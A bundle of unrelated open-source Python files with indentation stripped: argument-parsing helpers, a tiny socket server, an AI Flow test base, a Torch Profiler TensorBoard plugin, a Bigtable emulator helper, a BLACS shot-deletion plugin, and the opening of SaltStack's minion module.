def _args_parse(env):
args = []
argd = {}
for x in env.pop('ARGS', '').split('&'):
i = x.find('=')
if i > -1:
k, x = x[:i], x[i+1:]
else:
k = None
if k:
argd[unquote(k)] = unquote(x)
#argd[k] = x
else:
if x:
args.append(unquote(x))
#args.append(x)
env['HTTP_PARAMS'] = args
env['HTTP_KWARGS'] = argd
return env
def log(msg, kind='info', begin='', end='\n'):
try:
ts = "%Y-%m-%d %H:%M:%S"
try: ts = time.strftime(ts)
except: ts = time.strftime(ts)
if __hostname__:
if __profile__:
s = '{0}{1} {2} {4}.{5}:{3}:{6} {7}{8}'.format(begin, ts, __hostname__, __version__, __appname__, __profile__, kind, msg, end)
else:
s = '{0}{1} {2} {4}:{3}:{5} {6}{7}'.format(begin, ts, __hostname__, __version__, __appname__, kind, msg, end)
else:
if __profile__:
s = '{0}{1} {3}.{4}:{2}:{5} {6}{7}'.format(begin, ts, __version__, __appname__, __profile__, kind, msg, end)
else:
s = '{0}{1} {3}:{2}:{4} {5}{6}'.format(begin, ts, __version__, __appname__, kind, msg, end)
if sys.PY3:
sys.stdout.write(s)
else:
sys.stdout.write(s.encode('utf8'))
sys.stdout.flush()
except:
pass
traceback.print_exc()
def handle_commandline():
global __profile__, __index__
if sys.PY3:
from urllib.parse import unquote
else:
from urllib import unquote
args = []
kwargs = {}
sys.stdin.close()
_argv = sys.argv[1:]
#if os.isatty(sys.stdin.fileno()):
# _argv = sys.argv[1:]
#else:
# _argv = sys.stdin.read().split(' ') + sys.argv[1:]
for x in _argv:
if sys.PY3:
pass
else:
x = x.decode('utf8')
i = x.find('=')
if i > -1:
k, x = x[:i], x[i+1:]
else:
k = None
if k:
v = unquote(x).split(',')
if len(v) > 1:
kwargs[unquote(k)] = tuple(_int(x) for x in v)
else:
kwargs[unquote(k)] = _int(v[0])
else:
if x:
v = unquote(x).split(',')
if len(v) > 1:
args.append(tuple(_int(x) for x in v))
else:
args.append(_int(v[0]))
if "profile" in kwargs:
__profile__ = kwargs.pop("profile")
if "index" in kwargs:
__index__ = kwargs.pop("index")
return args, kwargs
def _int(x):
try:
fx = float(x)
ix = int(fx)
return ix if ix == fx else fx
except:
return x
########################################################################
if "__main__" == __name__:
main()
|
server.py
|
import sys
import socket
import threading
server_ip_address = sys.argv[1]
server_port = int(sys.argv[2])
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def accept(client_socket):
client_socket.sendall("ok".encode('utf-8'))
return
print ("Server: " + socket.gethostname())
server_socket.bind((server_ip_address, server_port))
server_socket.listen(32000)
while 1:
(client_socket, address) = server_socket.accept()
print ("Connected client: {}".format(address))
t = threading.Thread(target = accept, args=(client_socket,))
t.start()
t.join()
|
base_ete_test.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import os
import threading
from typing import Callable
import time
from airflow.events.scheduler_events import StopSchedulerEvent
from ai_flow.api.configuration import set_project_config_file
from airflow.contrib.jobs.event_based_scheduler_job import EventBasedSchedulerJob
from airflow.executors.local_executor import LocalExecutor
from ai_flow.application_master.master import AIFlowMaster
from notification_service.client import NotificationClient
from tests import db_utils
def project_path():
return os.path.dirname(__file__)
def project_config_file():
return project_path() + '/project.yaml'
def master_config_file():
return project_path() + '/master.yaml'
def workflow_config_file():
return project_path() + '/workflow.yaml'
master = AIFlowMaster(config_file=master_config_file())
def master_port():
return master.master_config.get('master_port')
class BaseETETest(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
master.start()
@classmethod
def tearDownClass(cls) -> None:
master.stop()
def setUp(self):
master._clear_db()
db_utils.clear_db_jobs()
db_utils.clear_db_dags()
db_utils.clear_db_serialized_dags()
db_utils.clear_db_runs()
db_utils.clear_db_task_execution()
db_utils.clear_db_message()
set_project_config_file(project_config_file())
def tearDown(self):
master._clear_db()
@classmethod
def start_scheduler(cls, file_path, executor=None):
if executor is None:
executor = LocalExecutor(3)
scheduler = EventBasedSchedulerJob(
dag_directory=file_path,
server_uri="localhost:{}".format(master_port()),
executor=executor,
max_runs=-1,
refresh_dag_dir_interval=30
)
print("scheduler starting")
scheduler.run()
def run_ai_flow(self, ai_flow_function: Callable[[], str], test_function: Callable[[NotificationClient], None],
executor=None):
dag_file = ai_flow_function()
def run_test_fun():
time.sleep(5)
client = NotificationClient(server_uri="localhost:{}".format(master_port()),
default_namespace="test")
test_function(client)
client.send_event(StopSchedulerEvent(job_id=0).to_event())
t = threading.Thread(target=run_test_fun, args=())
t.setDaemon(True)
t.start()
self.start_scheduler(dag_file, executor)
|
plugin.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# --------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import multiprocessing
import os
import threading
import time
from collections import OrderedDict
import werkzeug
from tensorboard.plugins import base_plugin
from werkzeug import wrappers
from . import consts
from . import utils
from .profiler import RunLoader
from .run import Run
logger = utils.get_logger()
class TorchProfilerPlugin(base_plugin.TBPlugin):
"""TensorBoard plugin for Torch Profiler."""
plugin_name = consts.PLUGIN_NAME
def __init__(self, context):
"""Instantiates TorchProfilerPlugin.
Args:
context: A base_plugin.TBContext instance.
"""
super(TorchProfilerPlugin, self).__init__(context)
self.logdir = os.path.abspath(context.logdir)
self._is_active = None
self._is_active_initialized_event = threading.Event()
self._runs = OrderedDict()
self._runs_lock = threading.Lock()
self._queue = multiprocessing.Queue()
monitor_runs = threading.Thread(target=self.monitor_runs, name="monitor_runs", daemon=True)
monitor_runs.start()
receive_runs = threading.Thread(target=self.receive_runs, name="receive_runs", daemon=True)
receive_runs.start()
def is_active(self):
"""Returns whether there is relevant data for the plugin to process.
"""
self._is_active_initialized_event.wait()
return self._is_active
def get_plugin_apps(self):
return {
"/index.js": self.static_file_route,
"/main.js": self.static_file_route,
"/index.html": self.static_file_route,
"/overall.html": self.static_file_route,
"/trace_viewer_full.html": self.static_file_route,
"/trace_embedding.html": self.static_file_route,
"/operator.html": self.static_file_route,
"/kernel.html": self.static_file_route,
"/runs": self.runs_route,
"/views": self.views_route,
"/workers": self.workers_route,
"/overview": self.overview_route,
"/operation": self.operation_pie_route,
"/operation/table": self.operation_table_route,
"/kernel": self.kernel_pie_route,
"/kernel/table": self.kernel_table_route,
"/trace": self.trace_route
}
def frontend_metadata(self):
return base_plugin.FrontendMetadata(es_module_path="/index.js")
def monitor_runs(self):
logger.info("Monitor runs begin")
# Set _is_active quickly based on file pattern match, don't wait for data loading
self._is_active = any(self._get_run_dirs())
self._is_active_initialized_event.set()
touched = set()
while True:
try:
logger.debug("Scan run dir")
run_dirs = self._get_run_dirs()
# Assume no deletion on run directories, trigger async load if find a new run
for name, run_dir in run_dirs:
if name not in touched:
logger.info("Find run %s under %s", name, run_dir)
touched.add(name)
# Use multiprocessing to avoid UI stall and reduce data parsing time
process = multiprocessing.Process(target=_load_run, args=(self._queue, name, run_dir))
process.daemon = True
process.start()
except Exception as ex:
logger.warning("Failed to scan runs. Exception=%s", ex, exc_info=True)
time.sleep(consts.MONITOR_RUN_REFRESH_INTERNAL_IN_SECONDS)
def receive_runs(self):
while True:
run = self._queue.get()
if run is None:
continue
logger.info("Add run %s", run.name)
with self._runs_lock:
is_new = run.name not in self._runs
self._runs[run.name] = run
if is_new:
self._runs = OrderedDict(sorted(self._runs.items()))
# Update is_active
if not self._is_active:
self._is_active = True
def _get_run_dirs(self):
"""Scan logdir, find PyTorch Profiler run directories.
A directory is considered to be a run if it contains 1 or more *.pt.trace.json[.gz].
E.g. there are 2 runs: run1, run2
/run1
/[worker1].pt.trace.json.gz
/[worker2].pt.trace.json.gz
/run2
/[worker1].pt.trace.json
"""
for root, _, files in os.walk(self.logdir):
for file in files:
if utils.is_chrome_trace_file(file):
run_dir = os.path.abspath(root)
if run_dir == self.logdir:
name = os.path.basename(run_dir)
else:
name = os.path.relpath(run_dir, self.logdir)
yield name, run_dir
break
def get_run(self, name) -> Run:
with self._runs_lock:
return self._runs.get(name, None)
@wrappers.Request.application
def runs_route(self, request):
with self._runs_lock:
names = list(self._runs.keys())
return self.respond_as_json(names)
@wrappers.Request.application
def views_route(self, request):
name = request.args.get("run")
run = self.get_run(name)
views = sorted(run.views, key=lambda x: x.id)
views_list = []
for view in views:
views_list.append(view.display_name)
return self.respond_as_json(views_list)
@wrappers.Request.application
def workers_route(self, request):
name = request.args.get("run")
run = self.get_run(name)
return self.respond_as_json(run.workers)
@wrappers.Request.application
def overview_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
data = profile.overview
data["environments"] = [{"title": "Number of Worker(s)", "value": str(len(run.workers))},
{"title": "Device Type", "value": "GPU" if profile.is_gpu_used else "CPU"}]
if profile.is_gpu_used:
data["environments"].append({"title": "Number of Device(s)", "value": "1"})
return self.respond_as_json(data)
@wrappers.Request.application
def operation_pie_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "OperationAndInputShape":
return self.respond_as_json(profile.operation_pie_by_name_input)
else:
return self.respond_as_json(profile.operation_pie_by_name)
@wrappers.Request.application
def operation_table_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "OperationAndInputShape":
return self.respond_as_json(profile.operation_table_by_name_input)
else:
return self.respond_as_json(profile.operation_table_by_name)
@wrappers.Request.application
def kernel_pie_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
return self.respond_as_json(profile.kernel_pie)
@wrappers.Request.application
def kernel_table_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "Kernel":
return self.respond_as_json(profile.kernel_table)
else:
return self.respond_as_json(profile.kernel_op_table)
@wrappers.Request.application
def trace_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
fopen = open
with fopen(profile.trace_file_path, 'rb') as f:
raw_data = f.read()
if profile.trace_file_path.endswith('.gz'):
headers = []
headers.append(('Content-Encoding', 'gzip'))
return werkzeug.Response(raw_data, content_type="application/json", headers=headers)
else:
return werkzeug.Response(raw_data, content_type="application/json")
@wrappers.Request.application
def static_file_route(self, request):
filename = os.path.basename(request.path)
extension = os.path.splitext(filename)[1]
if extension == '.html':
mimetype = 'text/html'
elif extension == '.css':
mimetype = 'text/css'
elif extension == '.js':
mimetype = 'application/javascript'
else:
mimetype = 'application/octet-stream'
filepath = os.path.join(os.path.dirname(__file__), 'static', filename)
try:
with open(filepath, 'rb') as infile:
contents = infile.read()
except IOError:
return werkzeug.Response('404 Not Found', 'text/plain', code=404)
return werkzeug.Response(
contents, content_type=mimetype
)
@staticmethod
def respond_as_json(obj):
content = json.dumps(obj)
return werkzeug.Response(content, content_type="application/json")
def _load_run(queue, name, run_dir):
import absl.logging
absl.logging.use_absl_handler()
try:
logger.info("Load run %s", name)
# Currently, assume run data is immutable, so just load once
loader = RunLoader(name, run_dir)
run = loader.load()
logger.info("Run %s loaded", name)
queue.put(run)
except Exception as ex:
logger.warning("Failed to load run %s. Exception=%s", ex, name, exc_info=True)
|
bigtable_emulator.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# disable module docstring for tests
# pylint: disable=C0114
# disable class docstring for tests
# pylint: disable=C0115
# disable warning for access to protected members
# pylint: disable=W0212
# disable warning for not using 'with' for resource-allocating operations
# pylint: disable=R1732
import os
import subprocess
import re
import tensorflow as tf
from threading import Thread
from typing import List
CBT_EMULATOR_SEARCH_PATHS = [
"/usr/lib/google-cloud-sdk/platform/bigtable-emulator/cbtemulator",
"/usr/local/google-cloud-sdk/platform/bigtable-emulator/cbtemulator",
"/v/google-cloud-sdk/platform/bigtable-emulator/cbtemulator",
"cbtemulator",
]
CBT_CLI_SEARCH_PATHS = [
"/usr/local/google-cloud-sdk/bin/cbt",
"/usr/bin/cbt",
"/v/google-cloud-sdk/bin/cbt",
"cbt",
]
CBT_EMULATOR_PATH_ENV_VAR = "CBT_EMULATOR_PATH"
CBT_CLI_PATH_ENV_VAR = "CBT_CLI_PATH"
def _get_cbt_binary_path(env_var_name, search_paths, description):
res = os.environ.get(env_var_name)
if res is not None:
if not os.path.isfile(res):
raise OSError(
f"{description} specified in the {env_var_name} "
"environment variable does not exist"
)
return res
for candidate in search_paths:
if os.path.isfile(candidate):
return candidate
raise OSError(f"Could not find {description}")
def _get_cbt_emulator_path():
return _get_cbt_binary_path(
CBT_EMULATOR_PATH_ENV_VAR, CBT_EMULATOR_SEARCH_PATHS, "cbt emulator"
)
def _get_cbt_cli_path():
return _get_cbt_binary_path(CBT_CLI_PATH_ENV_VAR, CBT_CLI_SEARCH_PATHS, "cbt cli")
def _extract_emulator_addr_from_output(emulator_output):
while True:
line = emulator_output.readline().decode()
if not line:
raise RuntimeError("CBT emulator stopped producing output")
if "running on" in line:
words = line.split()
for word in words:
if re.fullmatch("[a-z.0-9]+:[0-9]+", word):
return word
raise RuntimeError(f"Failed to find CBT emulator in the line {line}")
class BigtableEmulator:
def __init__(self):
emulator_path = _get_cbt_emulator_path()
self._emulator = subprocess.Popen(
[emulator_path, "-port", "0"],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=0,
)
out = self._emulator.stdout
self._emulator_addr = _extract_emulator_addr_from_output(out)
self._output_reading_thread = Thread(target=out.read)
self._output_reading_thread.start()
def get_addr(self):
return self._emulator_addr
def create_table(
self, project_id, instance_id, table_id, column_families, splits=None
):
cli_path = _get_cbt_cli_path()
cmd = [
cli_path,
"-project",
project_id,
"-instance",
instance_id,
"createtable",
table_id,
"families=" + ",".join([f"{fam}:never" for fam in column_families]),
]
if splits:
cmd.append("splits=" + ",".join(splits))
subprocess.check_output(cmd)
def write_tensor(
self,
project_id,
instance_id,
table_id,
tensor: tf.Tensor,
rows: List[str],
columns: List[str],
):
assert len(tensor.shape) == 2
assert len(rows) == tensor.shape[0]
assert len(columns) == tensor.shape[1]
cli_path = _get_cbt_cli_path()
for i, row in enumerate(tensor):
for j, value in enumerate(row):
cmd = [
cli_path,
"-project",
project_id,
"-instance",
instance_id,
"set",
table_id,
rows[i],
f"{columns[j]}={value.numpy().decode()}",
]
subprocess.check_output(cmd)
def stop(self):
self._emulator.terminate()
self._output_reading_thread.join()
self._emulator.stdout.close()
self._emulator.wait()
|
__init__.py
|
#####################################################################
# #
# /plugins/delete_repeated_shots/__init__.py #
# #
# Copyright 2017, JQI #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
from Queue import Queue
else:
from queue import Queue
import logging
import os
import subprocess
import threading
import sys
from qtutils import UiLoader
from labscript_utils.shared_drive import path_to_agnostic
import zprocess.locking
from blacs.plugins import PLUGINS_DIR
name = "Delete repeated shots"
module = "delete_repeated_shots" # should be folder name
logger = logging.getLogger('BLACS.plugin.%s'%module)
KEEP_ALL_SHOTS = 0
class Plugin(object):
def __init__(self, initial_settings):
self.menu = None
self.notifications = {}
self.initial_settings = initial_settings
self.BLACS = None
self.ui = None
self.n_shots_to_keep = initial_settings.get('n_shots_to_keep', KEEP_ALL_SHOTS)
self.delete_queue = initial_settings.get('delete_queue', [])
self.event_queue = Queue()
self.delete_queue_lock = threading.Lock()
self.mainloop_thread = threading.Thread(target=self.mainloop)
self.mainloop_thread.daemon = True
self.mainloop_thread.start()
def plugin_setup_complete(self, BLACS):
self.BLACS = BLACS
# Add our controls to the BLACS UI:
self.ui = UiLoader().load(os.path.join(PLUGINS_DIR, module, 'controls.ui'))
BLACS['ui'].queue_controls_frame.layout().addWidget(self.ui)
# Restore settings to the GUI controls:
self.ui.spinBox.setValue(self.n_shots_to_keep)
# Connect signals:
self.ui.spinBox.valueChanged.connect(self.on_spinbox_value_changed)
self.ui.reset_button.clicked.connect(self.on_reset_button_clicked)
BLACS['ui'].queue_repeat_button.toggled.connect(self.ui.setEnabled)
# Our control is only enabled when repeat mode is active:
self.ui.setEnabled(BLACS['ui'].queue_repeat_button.isChecked())
def on_spinbox_value_changed(self, value):
with self.delete_queue_lock:
self.n_shots_to_keep = value
# If the user reduces the number of shots to keep, but we had a
# larger list of shots awaiting deletion, remove shots from the
# deletion queue (without deleting them) until the queue is the
# same size as the number of shots we are now keeping. This means
# that if we set to keep 100 shots, and then we go ahead and run a
# hundred shots, if we then set it to keep 5 shots it won't delete
# the 95 oldest shots in the queue. Rather it will only delete the
# most recent 5 (and not immediately - over the next 5 shots).
while len(self.delete_queue) > self.n_shots_to_keep:
self.delete_queue.pop(0)
def on_reset_button_clicked(self):
self.ui.spinBox.setValue(KEEP_ALL_SHOTS)
def get_save_data(self):
return {'n_shots_to_keep': self.n_shots_to_keep,
'delete_queue': self.delete_queue}
def get_callbacks(self):
return {'shot_complete': self.on_shot_complete}
def on_shot_complete(self, h5_filepath):
# If we're keeping all shots, then there's nothing to do here:
if self.n_shots_to_keep == KEEP_ALL_SHOTS:
return
# Is the file a repeated shot?
basename, ext = os.path.splitext(os.path.basename(h5_filepath))
if '_rep' in basename and ext == '.h5':
repno = basename.split('_rep')[-1]
try:
int(repno)
except ValueError:
# not a rep:
return
else:
# Yes, it is a rep. Queue it for deletion:
self.delete_queue.append(h5_filepath)
self.event_queue.put('shot complete')
def mainloop(self):
# We delete shots in a separate thread so that we don't slow down the queue waiting on
# network communication to acquire the lock,
while True:
try:
event = self.event_queue.get()
if event == 'close':
break
elif event == 'shot complete':
while len(self.delete_queue) > self.n_shots_to_keep:
with self.delete_queue_lock:
h5_filepath = self.delete_queue.pop(0)
# Acquire a lock on the file so that we don't
# delete it whilst someone else has it open:
with zprocess.locking.Lock(path_to_agnostic(h5_filepath)):
try:
os.unlink(h5_filepath)
logger.info("Deleted repeated shot file %s" % h5_filepath)
except OSError:
logger.exception("Couldn't delete shot file %s" % h5_filepath)
else:
raise ValueError(event)
except Exception:
logger.exception("Exception in repeated shot deletion loop, ignoring.")
def close(self):
self.event_queue.put('close')
self.mainloop_thread.join()
# The rest of these are boilerplate:
def get_menu_class(self):
return None
def get_notification_classes(self):
return []
def get_setting_classes(self):
return []
def set_menu_instance(self, menu):
self.menu = menu
def set_notification_instances(self, notifications):
self.notifications = notifications
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import print_function
import logging
import getpass
import multiprocessing
import fnmatch
import copy
import os
import hashlib
import re
import types
import threading
import time
import traceback
import sys
import signal
import errno
from random import randint, shuffle
import salt
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
import yaml
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit
)
import salt.client
import salt.crypt
import salt.loader
import salt.utils
import salt.payload
import salt.utils.schedule
import salt.utils.event
from salt._compat import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if opts.get('file_client', 'remote') == 'local' and check_dns:
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: {0} not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.warn(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
'''
fn_ = os.path.join(cachedir, 'proc')
if not os.path.isdir(fn_):
# proc_dir is not present, create it
os.makedirs(fn_)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call,
and yamlify all arguments and key-word argument values if:
- they are strings
- they do not contain '\n'
If yamlify results in a dict, and the original argument or kwarg value
did not start with a "{", then keep the original string value.
This is to prevent things like 'echo "Hello: world"' to be parsed as
dictionaries.
'''
argspec = salt.utils.get_function_argspec(func)
_args = []
kwargs = {}
invalid_kwargs = []
for arg in args:
# support old yamlify syntax
if isinstance(arg, string_types):
salt.utils.warn_until(
'Boron',
'This minion received a job where kwargs were passed as '
'string\'d args, which has been deprecated. This functionality will '
'be removed in Salt Boron.'
)
arg_name, arg_value = salt.utils.parse_kwarg(arg)
if arg_name:
if argspec.keywords or arg_name in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
kwargs[arg_name] = yamlify_arg(arg_value)
continue
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append(arg)
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.get('__kwarg__') is True:
for key, val in arg.iteritems():
if key == '__kwarg__':
continue
kwargs[key] = val
continue
_args.append(yamlify_arg(arg))
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in data.items():
kwargs['__pub_{0}'.format(key)] = val
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
return _args, kwargs
def yamlify_arg(arg):
'''
yaml.safe_load the arg unless it has a newline in it.
'''
if not isinstance(arg, string_types):
return arg
try:
original_arg = str(arg)
if isinstance(arg, string_types):
if '#' in arg:
# Don't yamlify this argument or the '#' and everything after
# it will be interpreted as a comment.
return arg
if '\n' not in arg:
arg = yaml.safe_load(arg)
if isinstance(arg, dict):
# dicts must be wrapped in curly braces
if (isinstance(original_arg, string_types) and
not original_arg.startswith('{')):
return original_arg
else:
return arg
elif isinstance(arg, (int, list, string_types)):
# yaml.safe_load will load '|' as '', don't let it do that.
if arg == '' and original_arg in ('|',):
return original_arg
# yaml.safe_load will treat '#' as a comment, so a value of '#'
# will become None. Keep this value from being stomped as well.
elif arg is None and original_arg.strip().startswith('#'):
return original_arg
else:
return arg
else:
# we don't support this type
return original_arg
except Exception:
# In case anything goes wrong...
return original_arg
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if self.opts.get('file_client', 'remote') == 'remote':
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
self.opts['_safe_auth'] = False
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules()
else:
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
id_hash = hashlib.md5(self.opts['id']).hexdigest()
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def _gen_minions(self):
'''
Set up and tune in the minion options
'''
if not isinstance(self.opts['master'], list):
log.error(
